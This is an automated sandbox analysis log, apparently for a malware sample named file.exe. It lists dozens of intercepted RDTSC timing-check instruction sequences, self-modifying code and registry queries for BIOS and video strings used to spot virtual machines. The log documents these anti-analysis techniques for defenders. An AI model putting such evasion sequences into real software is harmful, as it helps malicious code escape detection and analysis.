                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E38C1 second address: 11E38C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E38C6 second address: 11E38DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push esi 0x0000000b push edi 0x0000000c pop edi 0x0000000d jns 00007F5E94E4CBA6h 0x00000013 pop esi 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3A3B second address: 11E3A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E55FD second address: 11E5601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5601 second address: 11E5613 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94757C9Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5613 second address: 11E561D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E561D second address: 11E5627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5E94757C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5627 second address: 11E562B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC38C second address: 11EC3B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F5E94757C9Bh 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jmp 00007F5E94757C9Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC3B0 second address: 11EC3B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECCC4 second address: 11ECCCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5E94757C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECCCE second address: 11ECCE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECF87 second address: 11ECF95 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECF95 second address: 11ECF99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECF99 second address: 11ECFA8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED801 second address: 11ED812 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F5E94E4CBA6h 0x00000009 ja 00007F5E94E4CBA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED812 second address: 11ED818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED818 second address: 11ED849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F5E94E4CBB9h 0x0000000b jmp 00007F5E94E4CBAEh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDB0D second address: 11EDB16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1198 second address: 11F11A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1315 second address: 11F1337 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94757CA2h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F5E94757C96h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F14A9 second address: 11F14AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F14AF second address: 11F14B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F14B7 second address: 11F14BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F14BD second address: 11F14C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F14C2 second address: 11F14C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1750 second address: 11F1756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1756 second address: 11F1760 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1760 second address: 11F1764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1A30 second address: 11F1A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1A39 second address: 11F1A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1BCB second address: 11F1BD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1BD9 second address: 11F1BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FEC21 second address: 11FEC40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBB9h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FEC40 second address: 11FEC44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FEC44 second address: 11FEC6B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E94E4CBA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F5E94E4CBB6h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FD392 second address: 11FD3AD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop ebx 0x00000008 jns 00007F5E94757C9Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FD808 second address: 11FD817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jc 00007F5E94E4CBA8h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FD817 second address: 11FD81E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE326 second address: 11FE32B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE32B second address: 11FE357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 js 00007F5E94757C96h 0x0000000c jno 00007F5E94757C96h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5E94757CA7h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FEABB second address: 11FEACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 jp 00007F5E94E4CBA6h 0x0000000c pop edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204EEA second address: 1204F0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5E94757C9Bh 0x0000000b popad 0x0000000c jmp 00007F5E94757C9Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204F0E second address: 1204F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204F14 second address: 1204F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204F1A second address: 1204F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F5E94E4CBBDh 0x0000000b jmp 00007F5E94E4CBB7h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204F3C second address: 1204F58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E94757CA8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12050A2 second address: 12050C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E94E4CBB5h 0x00000009 jng 00007F5E94E4CBA6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12050C1 second address: 12050D1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F5E94757C96h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1205252 second address: 1205256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1205256 second address: 1205273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5E94757CA5h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1211467 second address: 121146D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121146D second address: 121147E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E94757C9Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121147E second address: 121148A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149A18 second address: 1149A33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94757CA5h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149A33 second address: 1149A39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149A39 second address: 1149A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jo 00007F5E94757C9Ch 0x0000000f jnl 00007F5E94757C96h 0x00000015 jo 00007F5E94757CAEh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215594 second address: 12155C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5E94E4CBB2h 0x0000000b pushad 0x0000000c push edi 0x0000000d jmp 00007F5E94E4CBAEh 0x00000012 js 00007F5E94E4CBA6h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12155C7 second address: 12155CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12155CB second address: 12155CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E1D1 second address: 121E1DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F5E94757C96h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1225767 second address: 122576B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122576B second address: 122577B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F5E94757C98h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C2F3 second address: 122C30A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F5E94E4CBA6h 0x00000009 jl 00007F5E94E4CBA6h 0x0000000f jnp 00007F5E94E4CBA6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123041B second address: 1230443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94757C9Bh 0x00000009 jmp 00007F5E94757CA8h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230443 second address: 123044F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E94E4CBAEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230CBF second address: 1230CC9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230CC9 second address: 1230CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5E94E4CBA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230CD3 second address: 1230CD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230CD7 second address: 1230CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F5E94E4CBAAh 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230E6D second address: 1230E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123187D second address: 1231894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94E4CBB2h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123CC7F second address: 123CC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123CC85 second address: 123CC8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123F4CF second address: 123F4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1250D78 second address: 1250D7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1250C21 second address: 1250C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007F5E94757CA3h 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1262343 second address: 1262349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1262349 second address: 1262353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5E94757C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1263156 second address: 126315B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268E5B second address: 1268E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268E62 second address: 1268E70 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268E70 second address: 1268E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268E76 second address: 1268E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5E94E4CBA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268E80 second address: 1268E84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126ADA0 second address: 126ADA6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5850330 second address: 5850334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5850334 second address: 5850347 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5850347 second address: 58503D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94757CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5E94757C9Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F5E94757CA1h 0x00000017 sbb ax, 0306h 0x0000001c jmp 00007F5E94757CA1h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F5E94757CA0h 0x00000028 sbb si, 69A8h 0x0000002d jmp 00007F5E94757C9Bh 0x00000032 popfd 0x00000033 popad 0x00000034 xchg eax, ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F5E94757CA5h 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58504A1 second address: 58504A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58504A7 second address: 58504AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58504AB second address: 58504CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5E94E4CBB5h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58504CB second address: 58504DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E94757C9Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58504DB second address: 5850514 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F5E94E4CBB7h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5E94E4CBB5h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118FC88 second address: 118FC8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118FE47 second address: 118FE60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007F5E94E4CBBEh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: FDF66A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
